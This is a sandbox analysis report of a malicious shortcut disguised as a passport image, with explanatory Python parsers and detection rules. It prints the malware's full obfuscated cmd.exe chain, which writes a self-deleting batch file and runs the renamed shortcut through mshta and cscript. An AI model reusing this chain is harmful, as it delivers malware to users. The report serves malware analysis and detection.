Summary | ZeroBOX

DoublesidePassport.jpg.lnk

Tags UPX, GIF Format, AntiDebug, PE File, OS Processor Check, PE32, JPEG Format, AntiVM
Category FILE
Machine s1_win7_x6402
Started July 13, 2021, 6 p.m.
Completed July 13, 2021, 6:03 p.m.
Size 629.1KB
Type MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Mon Feb 12 21:29:00 2018, mtime=Mon Feb 12 21:29:00 2018, atime=Mon Feb 12 21:29:00 2018, length=345088, window=hidenormalshowminimized
MD5 041cc53c6152bc5ac0ada6fb7cb12bb4
SHA256 b60ae30ba90f852f886bb4e9aaabe910add2b70278e3a88a3b7968f644e10554
CRC32 54CDBD97
ssdeep 12288:0v2z5cBrqDwCZCFAOmjz2DDs/JqxUQCIrGUh/jo:0v8GBrSJsyx/7GNq
Yara
  • Lnk_Format_Zero - LNK Format
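The Type line is libmagic's reading of the ShellLinkHeader: LinkFlags says an item ID list, a relative path and command-line arguments are present, and length= is the header's FileSize field, the size of the link target, not of the shortcut. A 629.1 KB shortcut is itself worth a look: the structures of a normal link (header, IDList, LinkInfo, StringData, ExtraData) occupy a few kilobytes, and whatever follows the TerminalBlock is ignored by Explorer but still in the file. That matters here because the sample is later renamed to img.dat and handed to mshta, which reads the file as HTML. The reader below is an added example written for this page, not ZeroBOX code: it walks the header, skips the IDList and LinkInfo, decodes the StringData strings including COMMAND_LINE_ARGUMENTS, returns whatever sits after the TerminalBlock, and runs a few static triage checks. build_lnk is a constructed fixture: the relative path, arguments and appended bytes are invented, and only the 345088 FileSize value is taken from the report.

```python
"""Minimal MS-SHLLINK reader: header fields, the StringData strings (including
COMMAND_LINE_ARGUMENTS) and any bytes appended after the terminal ExtraData block."""
import re
import struct

# LinkFlags bits 0..7 (MS-SHLLINK 2.1.1), in the order of the structures they gate
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = (
    1 << i for i in range(8))
LNK_CLSID = bytes.fromhex('0114020000000000c000000000000046')   # {00021401-0000-0000-C000-000000000046}
STRING_FIELDS = (('name', HAS_NAME), ('relative_path', HAS_REL_PATH), ('working_dir', HAS_WORKDIR),
                 ('arguments', HAS_ARGS), ('icon_location', HAS_ICON))


def parse_lnk(data):
    header_size, clsid, flags = struct.unpack_from('<I16sI', data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError('not a Shell Link')
    target_size, icon_index, show_command = struct.unpack_from('<III', data, 0x34)
    pos = 0x4C
    if flags & HAS_ID_LIST:                      # IDListSize (2 bytes) + IDList, TerminalID included
        pos += 2 + struct.unpack_from('<H', data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts the whole LinkInfo structure
        pos += struct.unpack_from('<I', data, pos)[0]
    info = {'flags': flags, 'target_size': target_size, 'icon_index': icon_index,
            'show_command': show_command}
    width = 2 if flags & IS_UNICODE else 1
    for field, bit in STRING_FIELDS:             # StringData: CountCharacters (2 bytes) + characters
        if flags & bit:
            count = struct.unpack_from('<H', data, pos)[0]
            raw = data[pos + 2:pos + 2 + count * width]
            info[field] = raw.decode('utf-16-le' if width == 2 else 'cp1252')
            pos += 2 + count * width
    while pos + 4 <= len(data):                  # ExtraData: blocks until a BlockSize < 4 (TerminalBlock)
        block_size = struct.unpack_from('<I', data, pos)[0]
        if block_size < 4:
            pos += 4
            break
        pos += block_size
    info['overlay'] = data[pos:]                 # past the TerminalBlock: not part of the format at all
    return info


def triage(info):
    """Static checks a reviewer runs before detonating a shortcut."""
    reasons, args = [], info.get('arguments', '')
    if re.search(r'(?i)\b(cmd|powershell|mshta|cscript|wscript|rundll32)\b', args) or '&' in args or '%' in args:
        reasons.append('arguments build a command chain')
    if len(args) > 260:
        reasons.append('arguments longer than any plausible path')
    if info['overlay']:
        reasons.append('%d bytes appended after the TerminalBlock' % len(info['overlay']))
    if info['show_command'] == 7:                # SW_SHOWMINNOACTIVE: console opens minimized, unfocused
        reasons.append('ShowCommand minimizes the window')
    return reasons


def build_lnk(arguments, relative_path, show_command=7, overlay=b''):
    """Constructed fixture (not the report's sample): IDList, relative path, arguments, Unicode strings."""
    flags = HAS_ID_LIST | HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    header = struct.pack('<I16sII', 0x4C, LNK_CLSID, flags, 0x20) + bytes(24)   # ARCHIVE attr, zero FILETIMEs
    header += struct.pack('<III', 345088, 0, show_command) + bytes(12)          # FileSize as in the report; HotKey+Reserved
    body = struct.pack('<H', 2) + b'\x00\x00'                                   # IDList holding only its TerminalID
    for s in (relative_path, arguments):
        body += struct.pack('<H', len(s)) + s.encode('utf-16-le')
    return header + body + struct.pack('<I', 0) + overlay                       # TerminalBlock, then appended data


if __name__ == '__main__':
    sample = build_lnk('/c chgport & echo hello & set Oa=C:\\tmp\\test.c', '..\\..\\..\\Windows\\System32\\cmd.exe',
                       overlay=b'<script language="JScript">/* constructed */</script>')
    parsed = parse_lnk(sample)
    print(parsed['relative_path'], parsed['arguments'])
    print(triage(parsed))
```

On a real sample, read the file in binary and pass the bytes to parse_lnk; the interesting fields for this report are arguments and the length of overlay.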

Domains (Name / Response / Post-Analysis Lookup): No hosts contacted.
IP addresses (IP Address / Status / Action): No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW (logged 7 times with the same arguments and result)

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: 'chgport' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: hello
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: stop
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: continue
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Displays protocol statistics and current TCP/IP network connections. NETSTAT [-a] [-b] [-e] [-f] [-n] [-o] [-p proto] [-r] [-s] [-t] [interval] -a Displays all connections and listening ports. -b Displays the executable involved in creating each connection or listening port. In some cases well-known executables host multiple independent components, and in these cases the sequence of components involved in creating the connection or listening port is displayed. In this case the executable name is in [] at the bottom, on top is the component it called, and so forth until TCP/IP was reached. Note that this option can be time-consuming and will fail unless you have sufficient permissions. -e Displays Ethernet statistics. This may be combined with the -s option. -f Displays Fully Qualified Domain Names (FQDN) for foreign addresses. -n Displays addresses and port numbers in numerical form. -o Displays the owning process ID associated with each connection. -p proto Shows connections for the protocol specified by proto; proto may be any of: TCP, UDP, TCPv6, or UDPv6. If used with the -s option to display per-protocol statistics, proto may be any of: IP, IPv6, ICMP, ICMPv6, TCP, TCPv6, UDP, or UDPv6. -r Displays the routing table. -s Displays per-protocol statistics. By default, statistics are shown for IP, IPv6, ICMP, ICMPv6, TCP, TCPv6, UDP, and UDPv6; the -p option may be used to specify a subset of the default. -t Displays the current connection offload state. interval Redisplays selected statistics, pausing interval seconds between each display. Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once.
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: test22-PC
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Displays or sets the active code page nu
console_handle: 0x00000013
1 1 0

WriteConsoleW

buffer: mber. CHCP [nnn] nnn Specifies
console_handle: 0x00000013
1 1 0

WriteConsoleW

buffer: a code page number. Type CHCP withou
console_handle: 0x00000013
1 1 0

WriteConsoleW

buffer: t a parameter to display the active code
console_handle: 0x00000013
1 1 0

WriteConsoleW

buffer: page number.
console_handle: 0x00000013
1 1 0

WriteConsoleW

buffer: do exit
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\DoublesidePassport.jpg.lnk
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 1 file(s) moved.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: test5
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: dEL
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: "C:\Users\test22\AppData\Local\Temp\test.cmD"
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: mShTa
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: "C:\Users\test22\img.dat"
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The batch file cannot be found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: Microsoft (R) Windows Script Host Version 5.8 Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Microsoft (R) Windows Script Host Version 5.8 Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3044
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74362000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3044
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f93000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3044
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03bd0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3044
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03bd0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3044
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03bd0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3044
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03bd0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3044
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03bd1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74362000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03b50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74362000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\TextTransforms.exe
file C:\Users\test22\AppData\Local\Temp\test.cmD
file C:\Users\test22\AppData\Local\Temp\DoublesidePassport.jpg.lnk
cmdline cmd /c " set Ux=C:\Users\test22\AppData\Local\Temp& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&"""
cmdline "C:\Windows\System32\cmd.exe" /c chgport & echo hello & set Oa=C:\Users\test22\AppData\Local\Temp\test.c& cmd /c " set Ux=%cd%& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break ^& for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) ^& chcp /? ^& cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&"""
cmdline mShTa "C:\Users\test22\img.dat"
cmdline C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit & %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" & echo test5 & cd %Ux% & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &""
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo "
cmdline C:\Windows\system32\cmd.exe /S /D /c" set /p l="%Yf%hTa "%2.%1"" 1>"C:\Users\test22\AppData\Local\Temp\test.cMd""
wmi SELECT UUID FROM Win32_ComputerSystemProduct
wmi SELECT Version FROM Win32_OperatingSystem
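The cmdline rows above are one command chain seen from four cmd.exe processes. The shortcut's own arguments (the "C:\Windows\System32\cmd.exe" /c chgport line) only define Oa and hand the rest to a nested cmd /c. Every %NAME% that is still undefined when a cmd.exe parses its line survives as literal text and is resolved by the child that receives it, which is why the third process still shows %tEX%, %eym%%jeC% and %Ux% while %Oa%mD has already become test.cmD. The file test.cmD is written twice: echo first puts dEL "%0" & mS in it, set /p Yf= reads that line back, and the pipe echo | set /p l="%Yf%hTa "%2.%1"" re-expands it in a child cmd.exe (the two cmd.exe /S /D /c rows) and overwrites the file with dEL "%0" & mShTa "%2.%1". The innermost process then moves the shortcut to C:\Users\test22\img.dat and runs test.cmD dat C:\Users\test22\img, so %2.%1 becomes img.dat, the batch deletes itself (the console log shows The batch file cannot be found. right after) and mshta parses the renamed shortcut. The script below is an added example written for this page, not ZeroBOX code: it models those cmd.exe rules (parse-time expansion, undefined names kept literal, re-expansion across a pipe, set /p reading a file, batch %0/%1/%2) and peels the three recorded layers into their resolved form. It seeds %cd% with the Temp directory the console prompt shows and treats chgport, netstat, chcp and hostname as no-ops, which matches the console log, where they only print usage or error text.

```python
"""Peel the nested cmd.exe layers of the DoublesidePassport.jpg.lnk command line.

cmd.exe expands %NAME% once, when it parses a command line. Outside a batch file an
undefined name is left as literal text, so a name the outer cmd.exe defines is only
resolved by the child that receives the literal %NAME%. Each side of a pipe also runs
in a child cmd.exe, which re-parses, and so re-expands, its half of the command."""
import re

TEMP = r'C:\Users\test22\AppData\Local\Temp'   # working directory; the report's prompt line shows it

# The three outer layers exactly as the report records them, outermost first.
LAYERS = [
    r'"C:\Windows\System32\cmd.exe" /c chgport & echo hello & set Oa=C:\Users\test22\AppData\Local\Temp\test.c& cmd /c " set Ux=%cd%& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break ^& for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) ^& chcp /? ^& cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&"""',
    r'cmd /c " set Ux=C:\Users\test22\AppData\Local\Temp& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&"""',
    r'C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit & %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" & echo test5 & cd %Ux% & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &""',
]

VAR = re.compile(r'%([^%\s"&<>|]+)%')
WRAPPER = re.compile(r'(?i)^"?[\w:\\.]*cmd(?:\.exe)?"?\s+/c\s*"?')   # this layer's own `cmd /c "` prefix
NESTED = re.compile(r'(?i)(?:^|\s)[\w:\\.]*cmd(?:\.exe)?\s+/c\s*"')   # where the child's command line starts


def expand(line, env):
    """Parse-time %NAME% expansion: defined names are substituted, the rest stay literal."""
    return VAR.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), line)


def own_commands(line):
    """The commands this cmd.exe runs itself, split on unescaped '&' (^& is a literal)."""
    body = WRAPPER.sub('', line, count=1)
    nested = NESTED.search(body)
    if nested:
        body = body[:nested.start()]
    return [c.lstrip() for c in re.split(r'(?<!\^)&', body) if c.strip()]


def run(cmd, env, files):
    """Model only the builtins the chain depends on; chgport, netstat -x, chcp /? and
    hostname are noise that prints usage or error text, as the console log shows."""
    if '|' in cmd:                                       # right side of a pipe: a child cmd.exe re-expands it
        cmd = expand(cmd.split('|')[-1].lstrip(), env)
    m = re.match(r'(?i)set\s+/p\s+\w+=\s*"(.*)"\s*>\s*"?([^"&]+)"?', cmd)
    if m:                                                # set /p X="text"> file : prompt written, no newline
        files[m.group(2).lower()] = m.group(1)
        return
    m = re.match(r'(?i)set\s+/p\s+(\w+)=\s*<\s*"?([^"&]+)"?', cmd)
    if m:                                                # set /p X= <file : X becomes the file's first line
        env[m.group(1).lower()] = files.get(m.group(2).lower(), '').split('\n')[0]
        return
    m = re.match(r'(?i)set\s+(\w+)=(.*)', cmd)
    if m:                                                # set X=value : value runs to the next '&', spaces kept
        env[m.group(1).lower()] = m.group(2)
        return
    m = re.match(r'(?i)echo\s(.*?)>\s*"?([^"&]+)"?', cmd)
    if m:                                                # echo text> file : ^& reaches the file as '&'
        files[m.group(2).lower()] = m.group(1).replace('^&', '&') + '\n'


def peel(layers, cwd=TEMP):
    """Return each layer as its cmd.exe sees it after expansion, the final env and the files written."""
    env, files, views = {'cd': cwd}, {}, []              # %cd% is cmd.exe's dynamic current-directory name
    for raw in layers:
        line = expand(raw, env)
        views.append(line)
        for cmd in own_commands(line):
            run(cmd, env, files)
    return views, env, files


def run_batch(content, batch_path, args):
    """Batch argument substitution: %0 is the script's own path, %1, %2, ... its arguments."""
    for i, value in enumerate([batch_path, *args]):
        content = content.replace('%' + str(i), value)
    return content


if __name__ == '__main__':
    views, env, files = peel(LAYERS)
    for depth, view in enumerate(views):
        print('layer %d: %s\n' % (depth, view))
    dropper = TEMP + r'\test.cmD'
    print('test.cmD:', files[dropper.lower()])
    print('executed:', run_batch(files[dropper.lower()], dropper, ['dat', r'C:\Users\test22\img']))
```

The model deliberately skips cmd.exe's quote and caret handling beyond ^&, which is why layer 1 keeps the ^& that the real third process received as a plain &; the variable values and the final batch content come out the same as the report's resolved cmdline and console rows.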
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: CscRipt
parameters: "/E:jScript" "C:\Users\test22\AppData\Local\Temp\aria-debug-5070.log"
filepath: CscRipt
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: Cscript
parameters: "//E:JScript" "C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\Pictures\wctNVCHIP.tmp"
filepath: Cscript
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3044
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 16 (PAGE_EXECUTE)
base_address: 0x03bd0000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\img.dat
flags: 3
oldfilepath_r: C:\Users\test22\AppData\Local\Temp\DoublesidePassport.jpg.lnk
newfilepath: C:\Users\test22\img.dat
oldfilepath: C:\Users\test22\AppData\Local\Temp\DoublesidePassport.jpg.lnk
1 1 0
rule DebuggerCheck__GlobalFlags (no description)
rule DebuggerCheck__QueryInfo (no description)
rule DebuggerHiding__Thread (no description)
rule DebuggerHiding__Active (no description)
rule DebuggerException__SetConsoleCtrl (no description)
rule ThreadControl__Context (no description)
rule SEH__vectored (no description)
rule anti_dbg: Checks if being debugged
rule disable_dep: Bypass DEP
cmdline cmd /c " echo do exit & mOvE /y "Doub*.*k " "C:\Users\test22\img.dat" & echo test5 & cd C:\Users\test22\AppData\Local\Temp & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &"
cmdline netstat -x
cmdline chcp /?
FireEye Heur.BZC.YAX.Pantera.10.174A1AAB
ALYac Heur.BZC.YAX.Pantera.10.174A1AAB
Kaspersky HEUR:Trojan.WinLNK.Agent.gen
BitDefender Heur.BZC.YAX.Pantera.10.174A1AAB
MicroWorld-eScan Heur.BZC.YAX.Pantera.10.174A1AAB
Ad-Aware Heur.BZC.YAX.Pantera.10.174A1AAB
Emsisoft Heur.BZC.YAX.Pantera.10.174A1AAB (B)
SentinelOne Static AI - Suspicious LNK
GData Heur.BZC.YAX.Pantera.10.174A1AAB
MAX malware (ai score=82)
Arcabit Heur.BZC.YAX.Pantera.10.174A1AAB
Microsoft Trojan:Script/Wacatac.B!ml
VBA32 Trojan.Link.Crafted
Panda JS/BondatN.gen
parent_process cscript.exe martian_process DoublesidePassport.jpg
parent_process cscript.exe martian_process Cscript "//E:JScript" "C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\Pictures\wctNVCHIP.tmp"
parent_process cscript.exe martian_process "C:\Windows\System32\cscript.exe" "//E:JScript" "C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\Pictures\wctNVCHIP.tmp"
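The martian_process rows and the two ShellExecuteExW rows above describe the chain after the batch stage: mshta is given a .dat file, cscript is given a .log and a .tmp file with the engine forced by //E:JScript, and each script host is started by cmd.exe or by another script host. The checker below is an added example written for this page, not ZeroBOX's signature code: it runs three rules over constructed process-creation events that mirror those rows. The parent of the aria-debug-5070.log launch is not given on the page and is assumed to be mshta.exe; the last event is a constructed benign control.

```python
"""Flag the script-host launches this report records: mshta and cscript handed files
whose extension is not a script extension, a forced script engine (//E:JScript), and a
script host started by cmd.exe or by another script host."""
import ntpath
import re

WSH_EXT = {'.js', '.jse', '.vbs', '.vbe', '.wsf', '.wsh'}
SCRIPT_HOSTS = {'mshta.exe': {'.hta'}, 'cscript.exe': WSH_EXT, 'wscript.exe': WSH_EXT}
LAUNCHERS = {'cmd.exe', 'mshta.exe', 'cscript.exe', 'wscript.exe'}

# Constructed process-creation events that mirror the report's command lines. The
# parent of the first cscript launch is not stated on the page and is assumed here.
EVENTS = [
    {'image': r'C:\Windows\System32\mshta.exe', 'parent_image': r'C:\Windows\System32\cmd.exe',
     'cmdline': r'mShTa "C:\Users\test22\img.dat"'},
    {'image': r'C:\Windows\System32\cscript.exe', 'parent_image': r'C:\Windows\System32\mshta.exe',
     'cmdline': r'CscRipt "/E:jScript" "C:\Users\test22\AppData\Local\Temp\aria-debug-5070.log"'},
    {'image': r'C:\Windows\System32\cscript.exe', 'parent_image': r'C:\Windows\System32\cscript.exe',
     'cmdline': r'"C:\Windows\System32\cscript.exe" "//E:JScript" "C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\Pictures\wctNVCHIP.tmp"'},
    {'image': r'C:\Windows\System32\cscript.exe', 'parent_image': r'C:\Windows\explorer.exe',
     'cmdline': r'cscript.exe //nologo C:\scripts\inventory.vbs'},   # benign control, constructed
]


def split_args(cmdline):
    """Windows command-line tokens: a quoted run or a whitespace-delimited word."""
    return [quoted or word for quoted, word in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def review(event):
    """Return the names of the rules that fire for one process-creation event."""
    image = ntpath.basename(event['image']).lower()
    if image not in SCRIPT_HOSTS:
        return []
    hits, args = [], split_args(event['cmdline'])[1:]
    switches = [a for a in args if a.startswith('/')]
    operands = [a for a in args if not a.startswith('/')]
    if any(s.lstrip('/').lower().startswith('e:') for s in switches):
        hits.append('engine-override')            # content type no longer follows the file extension
    if any(ntpath.splitext(p)[1].lower() not in SCRIPT_HOSTS[image] for p in operands):
        hits.append('non-script-extension')       # .dat, .log, .tmp given to a script interpreter
    if ntpath.basename(event['parent_image']).lower() in LAUNCHERS:
        hits.append('spawned-by-shell-or-script-host')
    return hits


if __name__ == '__main__':
    for event in EVENTS:
        print(ntpath.basename(event['image']), review(event) or 'clean')
```

Fed real Sysmon event 1 or EDR process-creation records, review needs only the image, parent image and command line fields; the same three rules would have fired on every script-host launch in this report and on none of the benign control.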
Process injection Process 2444 resumed a thread in remote process 2584
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000002f8
suspend_count: 1
process_identifier: 2584
1 0 0